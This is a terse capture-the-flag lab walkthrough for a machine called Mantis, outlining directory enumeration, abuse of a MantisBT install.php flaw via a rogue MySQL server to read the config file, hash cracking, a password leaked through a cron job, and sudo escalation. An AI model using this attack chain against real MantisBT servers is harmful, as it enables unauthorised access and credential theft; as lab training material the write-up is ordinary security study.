Mantis 🔸

Enumeration

Web server shows a template of a landing page, feroxbuster discovers a /bugtracker

Searching for an exploit we find https://mantisbt.org/bugs/view.php?id=23173

Initial Access

We start the rogue server from https://github.com/allyshka/Rogue-MySql-Server

Visit http://192.168.169.204/bugtracker/admin/install.php?install=3&hostname=192.168.45.206

we can read config_inc.php file after seeing it in the mantis repo.

We have the database credentials

c7870d0b102cfb2f4916ff04e47b5c6f

Using hashcat

https://mantisbt.org/bugs/view.php?id=26091

Get the flag

Privilege Escalation

We see a backup script but can't see it, there is a cron job

Using pspy64

We see the password BugTracker007

sudo -l shows that mantis has full privs so

Post Exploitation

Get the flag